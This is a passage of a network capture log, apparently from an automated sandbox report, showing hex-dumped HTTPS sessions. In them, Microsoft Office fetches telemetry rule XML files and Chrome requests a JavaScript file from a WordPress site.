                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 23 9f 15 ad 9c 80 f5 b1 aa 7c b6 7a 9f 34 46 b8 e7 21 8e e3 b9 34 8e 93 3c d2 79 4e e1 62 38 ce 6a 13 ac 82 0d 1c c6 06 20 79 3e ae d2 8e ed 7c 83 cf bf 32 e2 e3 9f e0 18 e9 2f 9d 0f 6f e7 37 68 95 1c fe 13 b8 2d f8 9c 82 cf c5 71 8d b9 1c 6c 37 31 16 6c 56 83 b5 24 c9 9c 28 2b 19 00 a5 b9 76 7a eb 32 96 16 f2 ec aa 82 97 94 7b 2f 2e d2 86 f0 bb 0f 5e 11 c7 8f 98 f3 00 f9 6d c9 1e e2 87 95 f7 af ea 9e d6 f5 be 49 64 36 5c e8 78 57 1b 2b 9c 5e f1 e6 54 e9 fc ab c7 c7 3f 91 95 77 0a 7e 5c 38 57 24 65 0b b4 f7 da 0d ef 96 0b da f5 c2 ee 03 f0 75 dc c0 1b 1f 4a 8b a4 ab 5c 33 bc 89 15 6d 59 85 82 b3 b4 42 70 97 64 88 66 5b 21 d8 b2 62 05 25 43 74 94 b8 dc d2 a2 06 ed 67 56 9d 99 f6 e0 af db 27 35 75 cd dc f7 c5 f2 b2 39 ab 16 4c e9 11 fb 72 fa 47 3b a7 3c e2
                                                                                                                                                                                                                              Data Ascii: #|z4F!4<yNb8j y>|2/o7h-ql71lV$(+vz2{/.^mId6\xW+^T?w~\8W$euJ\3mYBpdf[!b%CtgV'5u9LrG;<
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 84 ca 22 a6 9a c4 0b 88 14 12 2b 9e 90 8c d5 3f 49 c6 93 8c c6 f7 df b8 2c 15 61 3d 63 84 7f 2d 9c 1d b9 a8 86 7d a5 a2 ce eb bf df 4e ae 90 6f c4 d7 5f 78 f2 e4 3b d2 6b 70 65 ca d3 1b 07 00 48 ff 14 fe 11 6e f5 d8 2b 67 1e 17 5e a3 ed 34 c1 71 2a c1 76 64 8e 8b 46 2e 73 44 83 54 a2 5d 79 5f bb f2 3d 1c 80 93 c8 8d 65 c8 2a 06 f1 2a ad 6b e5 38 65 9e ce 93 58 37 52 1d 3f ca 3c 32 ff 22 79 82 1c 7a 87 f8 3f 84 78 e8 ff 21 f4 07 03 7d 56 7c 2d e4 c6 e7 bb 89 7f a3 5f da 46 6e 7d f9 c5 5a a1 6d 80 54 7a 9d cc 26 13 af f2 06 12 1b 82 79 30 ff 17 12 cf 8f d6 f6 f3 ff 46 89 f1 3a ef d2 0a f0 d9 4c 7c b6 02 9f 8d a2 ef 47 dc 30 68 2b b4 77 fe ae bd ff 1b 62 ff 11 d4 b0 ab b5 13 7c 2f 61 81 56 c6 9f e7 18 9e 8a 10 9f a7 74 59 90 07 4e aa be 4d 60 15 4f 85 e6 0a
                                                                                                                                                                                                                              Data Ascii: "+?I,a=c-}No_x;kpeHn+g^4q*vdF.sDT]y_=e**k8eX7R?<2"yz?x!}V|-_Fn}ZmTz&y0F:L|G0h+wb|/aVtYNM`O
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 5e df 33 5a 68 3d 6d e3 23 c3 76 01 b7 77 ef 0d 6e 57 87 35 8b 7a f3 bd 96 dc d7 a1 ef c6 b9 1d 3a cc 5b c7 c6 6d 36 19 28 b6 43 9e 33 52 ed 01 32 8f 92 c3 5e 8b 26 6a ee e7 da 62 a1 86 72 db 29 e4 d5 59 bb cb 4f 1f d2 b9 bb 53 4a 60 fb 3a 75 47 66 bb c5 c8 dd 10 fa 89 bc 2f f4 eb a5 5d 90 be a8 e5 ee af e4 0f cf 76 5c b1 04 b9 9b be ab 80 0c 14 42 35 ef 32 96 32 04 99 dd 94 a2 62 41 c9 e2 8d 8c e1 05 67 7c 4e 96 5c 90 d6 71 ca 23 53 27 1d 2a 8a 3f 74 aa 62 f7 cc d7 c8 29 75 63 bb a9 ed 9b 25 90 f3 eb b6 41 68 e0 43 fb e7 75 47 d1 58 6d e5 4b 7a f5 13 d0 d6 34 bf fa 56 69 bf e9 53 5d f0 40 83 af 28 4d f5 c2 17 8e 11 7b 50 af 0f 6a 46 c4 65 e5 c7 ec 0c 9c 3a 31 0a 04 a1 6a e3 12 6d 91 58 fa b7 0b 58 17 75 8a 10 40 dc bb 98 4d c2 58 d7 91 88 46 0f 1a 24 80
                                                                                                                                                                                                                              Data Ascii: ^3Zh=m#vwnW5z:[m6(C3R2^&jbr)YOSJ`:uGf/]v\B522bAg|N\q#S'*?tb)uc%AhCuGXmKz4ViS]@(M{PjFe:1jmXXu@MXF$
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 67 46 b4 6b 37 a2 9d 3c e3 d6 ea c6 77 2b 43 d3 6f a9 ac 5f f2 6a 3b fa 0c 8d 21 16 81 47 09 ca 2a 27 22 c6 4d ba 24 40 bf 08 bf 39 76 ea df bb cd 34 02 c0 df 2f 0d ac 3e aa 1d 50 0c a1 ad a4 10 2e 41 8c ef eb af 7d 5f 7f e5 fb 0a 3f b2 5a ad f2 87 b5 eb a2 45 fb 4e bb 76 86 95 e9 1f 14 af 68 8d ab 4a 10 f1 6c 47 5c 14 21 36 dc 94 f6 93 d0 eb 91 f3 c1 c9 e4 3c 6a 2c 2b 15 33 89 49 ad c0 c4 14 48 a9 ab 15 82 60 b8 e9 8b a8 52 e2 07 2d 5c 38 a8 4f 9f c4 b4 b4 c4 eb 41 7a ec d3 87 96 5c 14 fd 61 0b ca 67 8b 7e 06 8b 2a a9 0b 07 69 fe 41 0b d5 b4 44 de 4f 2b 6a 78 c4 32 1e cb 20 48 2c e0 21 01 f0 5c 0f f0 01 cd c3 5b 88 1f 25 4d 40 55 d9 d8 f9 01 25 95 02 cc 96 6c a4 e3 83 0a d3 68 de 1e 0d b2 3f 84 3d 0a a9 42 20 ec 11 be d5 ae 6b d7 2b f9 05 fc 02 40 31 47
                                                                                                                                                                                                                              Data Ascii: gFk7<w+Co_j;!G*'"M$@9v4/>P.A}_?ZENvhJlG\!6<j,+3IH`R-\8OAz\ag~*iADO+jx2 H,!\[%M@U%lh?=B k+@1G
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 26 0b 50 5f eb 72 8b 05 89 4b 5c 42 07 18 02 2d 2f af ba ee 5d 75 f9 9c 34 c8 f8 22 79 97 1c 22 ef be 28 7c a7 1e f9 f9 88 da 7d 6a 77 c5 bf ea 32 79 f5 68 9f 3e 47 b1 9e b6 ea 08 24 ed df 4f 7e 08 6f 6d d7 6e ee 23 8f cc 85 87 c8 a8 d2 6e dd 22 fe 08 f2 43 10 f9 a1 79 ad 34 8d 85 7c 70 3b 6a 7b 6e cb aa 43 48 2b 50 6c 37 61 0d 04 07 18 6d 46 d9 46 d1 b1 ea e4 01 43 0d 0e 0e 5c ba a7 06 31 3d 3a c9 c7 af d7 61 8e 9c 5e 42 b4 c1 af 1d 7b 59 22 11 dc a8 b5 f8 58 43 51 94 52 35 71 c6 1e b5 fa c9 1a 14 6a a9 24 a8 79 79 0e d0 52 6d 84 f0 7a 11 5e 0b 62 8e 62 2c 15 71 46 6d bd 56 5c 7b ae 3b 37 9d db 45 e7 64 d0 a6 36 71 c8 d3 2e e4 6d 57 84 bf c5 c8 bd f8 67 e5 91 fb 5b cb 21 21 5e a0 b3 bb 26 ea fb e7 da 59 04 cf 8a 65 34 bc 8f ae bf b5 24 89 46 05 90 94 ec
                                                                                                                                                                                                                              Data Ascii: &P_rK\B-/]u4"y"(|}jw2yh>G$O~omn#n"Cy4|p;j{nCH+Pl7amFFC\1=:a^B{Y"XCQR5qj$yyRmz^bb,qFmV\{;7Ed6q.mWg[!!^&Ye4$F
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: 5d 5a 1a 09 34 3b 7c e1 c8 8c bb 1f 49 8f 39 20 48 89 b6 56 39 f9 3d 7c e3 e1 bb bb b4 6f 0e 5d 78 64 a6 5e 2e 1b f5 f2 71 42 13 88 bd 8b fc 93 d3 e3 6b 1e f9 33 45 e5 b2 b8 a6 5c 09 d7 83 e3 72 50 a1 28 56 43 a9 3d 37 0e 28 7a 15 7b 05 95 4d 6d c0 65 46 37 9f 26 23 19 6b 94 20 35 c4 d0 6e 28 15 1c e8 00 c5 f2 88 03 34 2f dc 26 36 0c 16 44 bd 5c d1 4a 30 26 92 49 e9 8e 49 71 9f d8 cd 3b da af ec 76 b4 49 d3 ad ab e2 9e 9c 3c 10 e2 db 4e 68 50 4e 3c cf 2d 5f fe dc f2 67 fa b5 6c d9 af 25 ec e6 fb ae 3d 73 f1 cc da be 3f 3d e5 db 7c 11 72 2f 9e 85 1b 89 8d 00 5e b4 a7 e4 c7 f1 19 29 c6 f3 13 86 ce fc 22 35 3d db c8 27 8f e8 3a 8b 7c 39 bc 8b f6 2f a9 d1 72 da 46 a0 25 6d 23 34 2f 29 66 32 36 80 ed 4c 7e 0e 52 b3 f6 5b ce 2c d8 72 f1 e2 16 13 8b 8f 05 51 c7
                                                                                                                                                                                                                              Data Ascii: ]Z4;|I9 HV9=|o]xd^.qBk3E\rP(VC=7(z{MmeF7&#k 5n(4/&6D\J0&IIq;vI<NhPN<-_gl%=s?=|r/^)"5=':|9/rF%m#4/)f26L~R[,rQ
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC1369INData Raw: ad fb b7 49 59 d6 c8 53 54 26 29 34 fb 23 8a 53 56 e3 55 1c 67 46 2d 55 80 fe 64 fb ba f8 4a 42 24 1e 50 e3 67 21 1d 28 72 16 42 ee d4 2f 4d 89 99 48 0d d1 bc 1d 8c 76 89 06 7b 12 15 b0 03 35 7f 92 e4 7e e1 13 27 c2 27 fe 60 b1 17 ed e4 fc 01 03 e6 0f 08 9f 41 20 cf 62 bf be 6a 0d ef f6 26 1f f7 8e 8d fd 2a b6 89 64 45 d7 e1 5e 1f 3f 7e 66 0f f2 8c b6 db c7 2f 85 34 b3 76 ca c7 77 a6 d0 9a f9 c0 09 da 12 f9 8d 05 65 9c ec c8 a7 06 b4 7f 63 6f bf 6a 33 70 00 39 dc 1b ec 7d 1a a2 8a fc 3a 56 ee 1c fe 85 35 05 dd ba cf d0 76 f9 f8 7b c8 2b 96 64 ed 39 1f df a9 71 63 33 c7 a3 33 ea 91 bd 28 5f 52 d9 3c 9e 11 29 9b 46 49 05 30 30 49 a2 0b 5b 03 08 06 87 d1 64 75 4a 6a 80 54 90 cb a4 22 a0 1e 87 3e f9 ce 49 9b 27 39 f3 a1 cf 71 d5 1f 0a 4a 9b 89 23 bc 48 58 09
                                                                                                                                                                                                                              Data Ascii: IYST&)4#SVUgF-UdJB$Pg!(rB/MHv{5~''`A bj&*dE^?~f/4vwecoj3p9}:V5v{+d9qc33(_R<)FI00I[duJjT">I'9qJ#HX


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              13192.168.2.64973613.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:01 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 474
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                                              x-ms-request-id: e3ea90ed-d01e-0028-6059-237896000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180401Z-17fbfdc98bbnhb2b0umpa641c800000006600000000000by
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              14192.168.2.64973813.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:01 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 415
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                                              x-ms-request-id: 5322e1a1-701e-0053-4f92-1f3a0a000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180401Z-r1755647c66kmfl29f2su56tc400000009a00000000080wy
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              15192.168.2.64973713.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:01 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 471
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                                              x-ms-request-id: 23d575bb-501e-0064-5ae7-201f54000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180401Z-r1755647c66k9st9tvd58z9dg800000008pg000000002516
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              16192.168.2.64974013.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:01 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 467
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                                              x-ms-request-id: ad393351-301e-0099-6d59-236683000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180401Z-17fbfdc98bbn5xh71qanksxprn00000006ag00000000223y
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              17192.168.2.64973913.107.253.72443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:01 GMT
                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                              Content-Length: 632
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                              ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                                              x-ms-request-id: 6d910339-b01e-0021-6856-23cab7000000
                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                              x-azure-ref: 20241023T180401Z-17fbfdc98bbn5xh71qanksxprn00000006a0000000002k0y
                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              18192.168.2.649742141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC586OUTGET /wp-content/uploads/hummingbird-assets/f36d1c67b2b5257dc0a6c9820472d804.js HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:01 UTC493INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:01 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Wed, 16 Oct 2024 14:55:46 GMT
                                                                                                                                                                                                                              ETag: W/"670fd3f2-18b35"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614814
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5af3b3fe51c-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
